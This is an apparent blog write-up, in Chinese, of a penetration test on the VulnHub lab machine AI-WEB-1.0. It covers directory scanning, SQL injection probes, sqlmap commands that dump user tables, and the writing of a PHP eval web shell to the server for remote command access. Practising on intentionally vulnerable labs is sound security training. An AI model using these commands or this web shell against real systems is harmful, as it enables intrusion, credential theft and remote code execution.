AI-WEB-1.0 靶机

AI-WEB-1.0

一、安装靶机环境

下载地址:
https://www.vulnhub.com/entry/ai-web-1,353/
下载压缩文件打开
image-20240729143948310

image-20240729145641048

开启虚拟机

二、信息收集

1.查看NAT模式IP段

image-20240729145846003

编辑–>虚拟网络编辑器

image-20240729145748137

御剑2014查IP

image-20240729150141135

访问网站

image-20240729150203131

御剑目录扫描

image-20240729150447652

访问robots.txt

image-20240729150533103

访问一下这些目录都禁止访问

image-20240729150812202

用御剑对这两目录扫描

image-20240729151127696

image-20240729151354711

在info.php中能看出

Linux系统
根目录:/home/www/html/web1x443290o2sdf92213
用户:webmaster@localhost

image-20240729153411162

在这个页面看到搜索框可以尝试注入了

image-20240729151559278

三、渗透

1.尝试SQL注入

判断是否有SQL注入

在输入框输入

1' //有报错信息
-1//无结果
1//有结果

image-20240729151925151

image-20240729152128318

用sqlmap注入

抓包设置注入点保存到1.txt

image-20240729152326187

(1)查库

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch --current-db

image-20240729152440519

库为:aiweb1

(2)查表

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D aiweb1 --tables

image-20240729152557064

(3)查user数据

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D aiweb1 -T user --dump

image-20240729152632015

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D aiweb1 -T systemUser --dump

image-20240729152846478

不过好像没有登录的地方也没有文件上传的地方。

2.通过sqlmap写入文件

shell.php

<?php @eval ($_POST['cmd']); ?>
python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --file-write C:\Users\1\Desktop\shell.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

image-20240729160240321

能访问证明写入成功

image-20240729160340232

用蚁剑

image-20240729160410682

连接成功

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值